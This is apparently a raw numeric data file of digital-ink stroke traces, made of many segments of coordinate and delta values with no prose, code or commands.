0-3637,-9-1-244,-2 1-236,11-2-136,-4-1 249,1 1-377,1-1-1,-1 1 1,0-1 0,1 0-1,-1 0 1,1 0-1,-1 0 1,0-1 0,1 1-1,-1-1 1,0 0-1,1 0 1,-1 0 0,0 0-1,0-1 1,0 1 0,6-4-1,18-9-125,-20 11 12,0 0 1,-1-1-1,1 0 0,-1 0 0,0 0 1,0-1-1,10-9 0,0 5 2,-15 8-1,1 1 1,-1-1-1,1 0 0,-1 1 1,1-1-1,-1 0 1,1 0-1,-1 0 0,0 0 1,0 0-1,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 0,1-3 1,2-2-1,-4 6 1,1-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 1 0,-1-1 0,0-2 0,-1 1 2,1 1-1,-1-1 1,0 0-1,0 0 1,0 1-1,0-1 1,0 1-1,0-1 0,-1 1 1,1 0-1,0 0 1,-1 0-1,-2-1 1,-53-1 194,51 3-152,1 0 35,-1 1 0,1-1 0,0 1 0,0 0 0,-1 1 0,1-1 0,0 1 0,1 0 1,-1 1-1,0 0 0,0 0 0,1 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 0 0,-7 10 0,9-9-57,0 0 0,0 0 0,0 1-1,1-1 1,0 1 0,0-1 0,1 1 0,-1 0-1,1 0 1,0 10 0,2-4-35,1 0 0,0-1 0,1 0 1,0 0-1,1 0 0,0 0 0,1 0 0,0-1 0,1 0 0,0 0 1,1 0-1,11 13 0,-15-21 23,0 1 1,0-1-1,0 0 1,0 0 0,0 0-1,1-1 1,-1 1-1,1-1 1,-1 0-1,1 0 1,-1 0-1,1 0 1,0-1-1,7 1 1,65-3-1215,-38 0-1719,4-5-2979,-32 2 3446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1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50 988,'3'-9'3934,"5"16"-1365,3 18-1383,-22 62 583,0-45-1327,0-6-123,13-23 352,3-26 748,1-5-1248,-2 9-116,-1 1 0,0-1 0,0 0-1,-1 0 1,3-14 0,5-19-47,-5 28 7,-4 14-13,-1-1 1,1 0-1,0 1 0,-1-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0-2 0,13-20 14,-12 22-16,0-1-1,1 0 1,0 1 0,-1 0-1,1-1 1,0 1-1,-1 0 1,1 0 0,0 0-1,0 0 1,0 0-1,0 1 1,0-1 0,0 0-1,0 1 1,0-1-1,0 1 1,0 0 0,3 0-1,-3 0 3,-1-1 1,1 1-1,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 1 1,0-1-1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 1,2-1-1,8-6 17,0 3-15,-6 2-4,-4 2 0,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0 0,1 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,-1-1 0,1 1 0,0 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,0 0 0,-1 1-1,1-1 1,0 1 0,0-1 0,-1 1-1,1-1 1,2 3 0,-2-2-4,-2-1 5,1-1-1,-1 1 0,1 0 0,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 0,1 0 1,-1 0-1,0 0 0,1 0 0,-1 0 1,1 1-1,-1-1 0,1 0 0,-1 0 1,0 1-1,1-1 0,-1 0 0,0 0 1,1 1-1,-1-1 0,0 0 0,1 1 1,-1-1-1,0 1 0,0-1 0,1 0 0,-1 1 1,0-1-1,0 1 0,0-1 0,0 1 1,0-1-1,1 0 0,-1 1 0,0-1 1,0 1-1,0-1 0,0 1 0,0-1 1,0 1-1,-1-1 0,1 1 0,0-1 1,0 1-1,0-1 0,0 0 0,0 1 1,-1-1-1,1 1 0,-9 31 230,7-25-180,-9 41 173,7-41-185,-3 9 152,7-15-21,-9-2 1409,29-20-1324,-17 17-223,0 0-1,0 0 1,1 0 0,-1 1-1,1-1 1,-1 1-1,7-4 1,18-11-60,-21 13 15,0 0 0,0 1-1,0-1 1,1 2 0,14-6-1,-20 8 22,0 1-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 1-1,0-1 0,0 1 1,0 0-1,0-1 1,0 1-1,0 0 0,0 0 1,0 0-1,0 0 0,-1 1 1,1-1-1,-1 0 1,1 1-1,-1-1 0,1 1 1,-1-1-1,0 1 0,0 0 1,3 3-1,5 6-9,-8-8 6,1-1 0,-1 1 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,-1 0 0,1 4 0,7 26 19,-8-32-22,1 0 1,-1 0 0,0-1-1,0 1 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 0-1,-1 0 1,1-1 0,0 1-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0-1-1,-1 1 1,1 0 0,-1 0-1,0 0 1,-5 17 2,4-9-45,0 0 1,0 0 0,-1 0 0,0-1-1,-8 15 1,2-10-555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2.3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12 448,'0'0'208,"0"-1"1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0 0 1,0-1-1,0 1 0,0-1 1,-1 1-1,1-1 1,0 1-1,0 0 1,0-1-1,-1 1 1,1-1-1,0 1 1,0 0-1,-1-1 0,1 1 1,0 0-1,-1-1 1,1 1-1,0 0 1,-1 0-1,0-1 1,1 1-137,-1 1-1,1-1 1,0 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1-1,0 15 395,1-5-239,-1 0 0,-1 0 1,0 0-1,0 0 0,-6 21 0,-4 40 579,4-39-278,6-27-387,0 1 0,0-1 0,-1 0 0,1 0 0,-2 0 0,-2 8 0,-1 6 290,17-11-67,35-11 65,-13 1-497,-28 2 60,-1 0 0,1 1-1,0-1 1,-1 1 0,1 0 0,6 5-1,-10-6 15,1 1-1,-1-1 0,0 1 1,1-1-1,-1 1 1,0-1-1,0 1 0,0 0 1,-1-1-1,1 1 1,0 0-1,-1 0 0,1-1 1,-1 1-1,1 0 1,-1 0-1,0 0 1,0 0-1,0 3 0,-1-1 42,0-1 0,-1 1 0,1-1-1,-1 1 1,0-1 0,0 0 0,0 0 0,0 0-1,-1 0 1,1-1 0,-4 4 0,-9 13 485,11-15-457,1 1 0,0-1 0,-1 0-1,0-1 1,0 1 0,0-1-1,0 1 1,-1-1 0,1-1 0,-1 1-1,1-1 1,-1 1 0,0-1 0,0-1-1,-10 3 1,-2 0-67,1-1 1,-1-1-1,-30 0 0,17-7 90,7 2-686,10 6-2686,8 1 2399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85 128 1056,'0'-2'212,"1"0"-1,-1 1 1,1-1-1,-1 1 1,1-1-1,0 0 0,-1 1 1,1-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,1-1-1,-1 1 1,0 0-1,2-1 1,-1 1-171,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 1,-1 0-1,1-1 1,-1-2 0,2-1 64,1 0 0,-1 0 0,0 0 0,1 0 0,0 0 0,0 1 0,1 0 0,-1-1 1,1 1-1,0 0 0,5-3 0,-9 6-69,0 1 1,1 0-1,-1-1 1,0 1-1,1-1 1,-1 1-1,0-1 1,0 1-1,0-1 1,1 1-1,-1 0 1,0-1-1,0 1 1,0-1-1,0 1 1,0-1-1,0 1 1,0-1-1,0 1 0,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,-1 1-1,1-1 1,0 1-1,0-1 1,-1 1-1,1-1 1,0 1-1,0 0 1,-1-1-1,1 1 1,0-1-1,-1 1 1,1 0-1,-1 0 1,1-1-1,0 1 1,-1 0-1,1-1 0,-1 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1-1-1,-1 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,0 1-1,-5-1 177,-1 1 0,1 0 0,0 0 0,0 1 0,-1 0 0,1 0-1,0 0 1,1 1 0,-1 0 0,0 0 0,1 1 0,0-1 0,0 1 0,0 0 0,0 0-1,0 1 1,1 0 0,0 0 0,0 0 0,-6 9 0,2-4-13,7-10-184,0 1 0,0 0 0,0 0 0,1-1 1,-1 1-1,0 0 0,0 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 1,1 0-1,0 0 0,-1 0 0,1 3 1,-6 16 189,6-20-203,-1 1 0,1-1 1,-1 1-1,1 0 1,0-1-1,0 1 1,-1 0-1,1-1 1,0 1-1,0 0 1,0-1-1,0 1 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,0-1-1,1 1 0,-1 0 1,0-1-1,1 1 1,-1 0-1,0-1 1,1 1-1,-1-1 1,0 1-1,1-1 1,-1 1-1,1-1 1,-1 1-1,2 0 1,6 12 96,-8-12-97,1 0 1,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,2 0 0,5 4-246,10 5 402,0 0 1,26 8-1,-3-9-2662,3-13-5709,-34-1 5441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0 370 1420,'0'0'2310,"11"6"-374,-10-4-1855,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 1,0-1-1,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 1,1 0-1,-1-1 0,1 1 0,2 1 0,36 14 227,-35-15-256,1 0 0,-1-1 0,1 0 0,-1 0-1,1 0 1,-1-1 0,1 0 0,-1 0 0,1 0 0,-1-1-1,0 1 1,1-1 0,-1-1 0,0 1 0,6-5-1,8-5 434,0 0 0,23-21-1,-41 32-398,1 0 0,-1 0 0,0 0 0,0 0-1,0-1 1,0 1 0,1 0 0,-2 0 0,1-1-1,0 1 1,0 0 0,0-1 0,-1 1 0,1-1 0,-1 1-1,1-1 1,-1 0 0,1 1 0,-1-1 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 1 0,0-1 0,-1 0-1,1 1 1,0-1 0,-1 1 0,0-1 0,0-2-1,-4-7 576,5 10-647,0 1-1,0-1 1,0 0 0,0 1 0,0-1 0,0 1 0,0-1-1,-1 1 1,1-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1-1,0-1 1,-1 1 0,1-1 0,0 1 0,-1 0 0,1-1 0,-1 1-1,1-1 1,-1 1 0,1 0 0,-1 0 0,0-1 0,-6-3 160,-1-1-47,1 1-1,-1 0 1,0 1 0,-13-5-1,17 8-115,1-1 0,-1 1 0,1-1 0,0 1-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 1-1,1 0 1,0 0 0,-1 0 0,1 0 0,0 0 0,-6 4-1,-10 5 10,13-7-22,1-1 0,-1 1-1,1 0 1,0 0-1,0 0 1,0 0-1,1 1 1,-1 0-1,1 0 1,0 1 0,0-1-1,0 1 1,0 0-1,1 0 1,0 0-1,-4 10 1,5-11-18,-1 4-62,0-1-1,1 1 0,0 0 1,0 0-1,0 12 1,2-19-17,0 1 1,0-1-1,0 0 1,0 0-1,0 1 1,0-1-1,1 0 1,-1 0 0,0 0-1,1 0 1,-1 1-1,1-1 1,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,0-1-1,0 1 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 0 0,1 1-1,-1-1 1,0 0-1,0 0 1,0 1-1,1-1 1,-1 0-1,0 0 1,0 0-1,0-1 1,1 1 0,-1 0-1,0 0 1,0-1-1,0 1 1,1 0-1,0-1 1,11-3-547,0 0 0,0 0 0,0-1 0,0-1 0,-1 0 0,0-1 0,0 0 0,-1-1 0,1 0 0,12-13 0,-6 4 280,0-1 1,-2-1 0,0-1 0,25-40 0,-36 51 654,-1-1-1,0 0 1,0 0 0,-1 0 0,0-1 0,0 1 0,-1-1 0,0-17 0,0-50 4264,-2 53 886,11 50-3851,-1 8-1136,-8-29-430,0 0 1,-1 0-1,1 0 0,-1 1 0,0-1 1,1 9-1,0-3-18,0 0-1,0-1 1,1 1 0,0-1 0,0 1 0,9 15 0,-5-10-37,-3-7 40,19 39-2551,-19-40 906,0-1 0,1 0 0,-1-1 0,1 1 0,9 7 0,-3-2-1091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65 252,'-1'5'7183,"0"-4"-7145,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 1 0,0 0 0,1 38 412,0-33-368,0 0 0,-1 0-1,0 0 1,0 1 0,-1-1 0,-1 9 0,-16 91 667,12-62-788,9-29 448,-2-15-361,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,0 0 0,1 0-1,-1-1 1,0 1 0,0 0 0,1 0 0,-1 0 0,0 0-1,0-1 1,1 1 0,-1 0 0,0 0 0,0 0-1,1-1 1,-1 1 0,0 0 0,0 0 0,0-1 0,0 1-1,0 0 1,1 0 0,-1-1 0,0 1 0,0 0 0,0-1-1,0 1 1,0 0 0,0 0 0,0-1 0,14-53 861,-3 25-840,1 1 1,17-31-1,4-6-48,-29 56 10,2 0-1,-1 1 1,1 0-1,0 1 1,0-1 0,12-9-1,6-8 35,-21 22-60,1 0-1,-1 0 1,0 1-1,1-1 1,0 1-1,0 0 1,-1 0-1,1 1 1,0-1 0,1 1-1,-1 0 1,0 0-1,0 0 1,7 0-1,-10 1-3,1-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1-1 1,-1 1-1,1 0 0,-1-1 0,1 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,0 2 0,0 0-8,1 1-1,-1 0 0,0-1 0,-1 1 1,1-1-1,-1 1 0,0-1 0,0 1 1,0-1-1,-1 1 0,0-1 0,1 0 1,-1 0-1,-1 0 0,1 0 1,-1 0-1,1 0 0,-1-1 0,-5 6 1,-19 20 178,-34 30 1,51-51-642,0 1 0,-1-2 1,0 0-1,0 0 0,0-1 1,-1 0-1,-18 6 0,21-11-505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6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51 115 1148,'-12'6'2140,"11"-5"-2055,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 2 0,23 38 1291,-19-39-1240,0 0 0,0 0-1,0 0 1,0-1 0,0 0-1,0 0 1,0 0 0,0 0-1,0-1 1,0 1 0,1-1-1,-1 0 1,0 0 0,0-1-1,1 1 1,-1-1 0,0 0-1,5-2 1,15-8 676,-19 9-594,-1 0 0,0 1 0,-1-2 0,1 1 0,0 0 0,0-1 0,-1 1 0,7-7 0,11-20 1006,-20 26-1108,0 0 0,0 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,-1 0 0,0-3 0,1-1 226,0 5-278,0 0 0,0-1-1,-1 1 1,1 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,1 1-1,-1 0 1,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,-1 0 0,1 1-1,-1-1 1,-2-1 0,-21-30 526,16 27-463,-11-5 38,19 11-150,-1 0-3,-7 0-6,6 0-9,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1-1,0 0 1,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-3 4 0,-10 11-41,8-13 28,3-3 9,0 0 1,1 0 0,-1 0 0,0 0 0,1 1-1,0-1 1,-1 1 0,1-1 0,0 1 0,0 0-1,1 0 1,-1 0 0,0 0 0,1 0 0,0 0-1,-2 6 1,-1 13-75,3-21 52,1 0 1,-1 0 0,1 1 0,-1-1-1,1 0 1,0 1 0,0-1 0,0 0-1,-1 1 1,1-1 0,1 0 0,-1 1-1,0-1 1,0 0 0,0 1 0,1-1 0,-1 0-1,1 1 1,-1-1 0,1 0 0,-1 0-1,1 1 1,0 0 0,9 18-2284,-10-19 2002,0 0 1,1 0-1,-1 1 0,1-1 1,-1 0-1,1 0 1,-1 0-1,1 0 0,0 1 1,-1-1-1,1 0 0,0 0 1,0-1-1,0 1 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 1,0 0-1,1-1 0,-1 1 1,0-1-1,0 1 0,0-1 1,1 0-1,-1 1 1,0-1-1,1 0 0,-1 0 1,0 0-1,0 0 1,1 0-1,1-1 0,8 1-2286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19 1436,'0'-3'691,"1"-10"4096,-1 13-4742,0 0 0,1 0 0,-1 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,0 1 0,1 3 154,0 0 1,0 0-1,-1 1 1,1-1-1,-1 1 1,0-1-1,0 0 1,-1 6-1,0 0 111,-10 63 194,11-64-495,0-7-15,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1-1,1 0 1,-1-1 0,1 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,2 1 0,6 5-824,4-2-1667,-1-13-3982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0 972,'0'2'5576,"0"2"-4395,2 3-975,1 0 0,-1-1-1,1 1 1,1-1 0,6 10 0,0-3-87,-8-10-127,0 0 0,1 0 0,-1 0 0,1 0 0,0 0-1,0-1 1,0 1 0,0-1 0,4 2 0,-4-2-111,0 0-1,1-1 1,-1 1-1,0-1 1,1 0-1,-1 0 1,1 0 0,6 0-1,-6-1-249,0 0-1,-1-1 1,1 0-1,0 1 1,0-1-1,-1 0 1,1-1 0,-1 1-1,1-1 1,-1 1-1,1-1 1,-1 0-1,0 0 1,0-1 0,4-3-1,4-5-1030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259 1 1128,'0'0'1194,"-32"19"3223,-31 53-1330,9 0-1019,32-42-1516,19-25-493,-1 0 0,1 0 1,-1 0-1,-1 0 0,-8 7 0,12-11-47,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,1 1 0,-11 14 90,9-14-106,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-1 0 1,1 0-1,-1 4 0,-11 16-573,11-10-1232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8.5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1 504,'-43'25'7249,"27"-11"-6550,1 2-1,1-1 1,0 2 0,1 0 0,1 0 0,1 1 0,0 1 0,1 0-1,-12 34 1,11-3 245,10-46-907,0 0 0,1 0-1,-1 0 1,1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,1 0-1,0 0 1,2 8 0,3 19 87,-5-28-125,-1 0 0,1-1 0,0 1 0,0-1 0,1 1 0,-1-1-1,0 1 1,1-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0-1-1,4 4 1,32 23-1004,-28-20-941,-3-4-763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8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86 796,'-1'1'60,"1"-1"1,-1 0-1,0 0 0,1 1 0,-1-1 1,0 1-1,1-1 0,-1 0 1,1 1-1,-1-1 0,1 1 0,-1-1 1,1 1-1,0 0 0,-1-1 0,1 1 1,-1-1-1,1 1 0,0 0 1,0-1-1,-1 1 0,1 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0-1 1,0 1-1,0 0 0,0-1 0,0 1 1,0 0-1,1 0 0,-1-1 1,0 1-1,0-1 0,1 1 0,-1 0 1,1-1-1,-1 1 0,0-1 0,1 1 1,0 0-1,5 15 654,-6-14-660,1 1 0,0-1 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,1 0 0,0 0-1,-1-1 1,1 1 0,0-1 0,0 1 0,0-1 0,1 0-1,-1 0 1,0 0 0,0 0 0,1 0 0,-1 0-1,0-1 1,1 1 0,4 0 0,-3 0-10,0 0 0,0 0 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0-1 0,1 1 0,-1-1 0,0 0-1,0 0 1,0 0 0,0-1 0,-1 1 0,1-1 0,5-3 0,26-19 262,8-6 539,-41 27-758,0 1 0,0 0 0,-1 0 1,1-1-1,-1 1 0,1-1 0,-1 1 0,0-1 0,0 1 1,0-1-1,0 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,0-4 1,0 4 12,-1 0 0,0 1 0,1-1 1,-1 0-1,-1 0 0,1 1 0,0-1 1,-1 1-1,1-1 0,-1 1 0,0-1 1,1 1-1,-1 0 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 1 0,-1-1 1,1 1-1,-1-1 0,0 1 0,1 0 1,-6-2-1,5 2-69,-1 0 1,1 0-1,0 0 0,-1 0 1,1 0-1,-1 1 1,1-1-1,-1 1 0,0 0 1,1 0-1,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1 0 1,0 0-1,-1 1 0,1-1 1,0 1-1,-5 3 0,-23 15-4,26-17-61,0 0 0,1-1 0,-1 2 0,1-1 0,-1 0 0,1 1 0,0 0 0,-6 8 0,-19 26-6839,27-32 4167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0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60 516,'-10'7'6786,"9"5"-5895,1-11-829,-1 1 1,1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0 0,1 0-1,-1 0 1,1 0-1,0-1 1,-1 1-1,1 0 1,0 0-1,0-1 1,0 1-1,0-1 1,2 2-1,8 4 316,-5-2-287,1-1 1,-1-1-1,1 1 1,0-1-1,0 0 1,0-1 0,0 0-1,14 3 1,-18-2-93,-3-3 3,0 0-1,0 0 0,0 1 1,1-1-1,-1 0 1,0 0-1,0 1 0,0-1 1,0 0-1,1 0 1,-1 0-1,0 1 0,0-1 1,1 0-1,-1 0 0,0 0 1,0 0-1,1 1 1,-1-1-1,0 0 0,1 0 1,-1 0-1,0 0 1,0 0-1,1 0 0,-1 0 1,0 0-1,1 0 1,-1 0-1,0 0 0,0 0 1,1 0-1,-1 0 0,0 0 1,1 0-1,-1 0 1,0-1-1,0 1 0,1 0 1,-1 0-1,0 0 1,0 0-1,1-1 0,-1 1 1,4-2 9,-2 2 83,0-1 0,0 1 0,0-1 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1-1,-1 1 1,3-3 0,-1-2 29,-2 5-117,-1 1 0,1-1 0,0 0 0,-1 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0-2 0,1-11 7,-1 11-8,1 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0-1-1,0 1 1,-1 0 0,1-1 0,-1 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,-1 0 0,-1-4-1,1 5 48,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1-1,0 1 1,1-1 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-2 0,-32-17 1694,-3 9-1508,30 14-282,0 1 0,0-1 0,0 1 0,0 0 0,1 0 1,-1 1-1,1-1 0,0 1 0,0 0 0,1 0 0,-1 1 1,1-1-1,0 0 0,1 1 0,-1 0 0,1 0 0,0 0 0,1 0 1,-1 0-1,1 0 0,0 11 0,-4-3-823,1-8-1130,2 4-5413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47 236,'24'-30'6410,"-23"29"-6189,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0 0 1,1-1-1,-1 1 0,1 0 0,1-1 0,-2 2-115,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,0 1 1,-1 1-1,2 0-83,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,1 3 0,3 21 77,-4-18-213,-1 0 1,1-1-1,0 1 0,1 0 0,-1 0 0,1 0 0,1-1 0,-1 1 0,1-1 0,0 1 0,1-1 0,-1 0 0,1 0 0,1-1 0,-1 1 0,1-1 0,7 7 1,-11-12-9,-1 0 1,1 1 0,0-1-1,-1 0 1,1 0 0,-1 0 0,1 1-1,0-1 1,-1 0 0,1 0 0,0 0-1,0 0 1,-1 0 0,1 0-1,0-1 1,-1 1 0,1 0 0,-1 0-1,1 0 1,0-1 0,-1 1-1,2-1 1,13-9-8712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1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93 532,'8'32'6081,"13"-4"-4366,-14-20-1605,1-1 0,0-1 0,1 1 0,14 7 0,-21-13-99,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 0 0,0 1 0,3-2 0,29-21 35,-32 22-41,1-1 1,-1 0-1,0 0 0,1 0 0,-1-1 1,0 1-1,0 0 0,-1-1 0,1 0 1,0 1-1,-1-1 0,1 0 0,-1 1 0,0-1 1,0 0-1,0 0 0,-1 0 0,1 0 1,0-4-1,4-9 222,-5 15-213,0 1-1,1 0 1,-1-1 0,0 1 0,0-1 0,0 1 0,1 0-1,-1-1 1,0 1 0,0-1 0,0 1 0,0 0 0,0-1-1,0 1 1,0-1 0,0 1 0,0-1 0,0 1-1,0 0 1,0-1 0,0 1 0,0-1 0,0 1 0,-1 0-1,1-1 1,0 1 0,0-1 0,0 1 0,-1 0 0,1-1-1,0 1 1,0 0 0,-1-1 0,1 1 0,0 0 0,-1-1-1,1 1 1,0 0 0,-1-1 0,-10-30 1049,8 27-970,0-1 0,0 1 0,-1 0 0,1 0 1,-1 1-1,0-1 0,0 1 0,0 0 0,0 0 1,-1 0-1,1 0 0,-1 1 0,0 0 0,0 0 0,0 0 1,-7-1-1,8 2-92,1 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,1-1 0,-1 1 0,1 1 0,-1-1 0,1 0 0,0 0 0,-1 1 0,1-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,1-1 0,0 1 0,0 1 0,0-1 0,-2 5 0,3-3-60,-1-1-1,0 1 1,0-1 0,-1 1-1,1-1 1,-1 0 0,-3 7-1,-5 10-964,7-9 391,2-9 287,1-1-1,0 1 1,-1-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1-1,0 0 1,-1 0 0,1 0 0,-4 3 0,-4 2-1830,8 4-132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1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1860,'0'-1'70,"0"1"-1,0 0 1,0 0-1,0 0 1,-1 0-1,1-1 1,0 1-1,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,0 0 1,1-1-1,-1 1 1,0 0-1,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,6 12 4769,-7 12-3257,1-8-875,0 0 0,0 0-1,2 0 1,6 29-1,2 35 394,-3-51-929,-6-19-138,1 0 0,0 0 0,1-1 0,0 1 0,1-1 0,9 17 0,4 7 3,-16-30-24,0 1 0,1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,1 0 0,-1 0 1,7 6-1,8 10-92,7 4-3547,-13-27-5275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3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25 380,'-6'1'930,"12"-7"409,-6 5-965,2-17 3328,3 18-3201,-5 0-374,-1 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,0-1 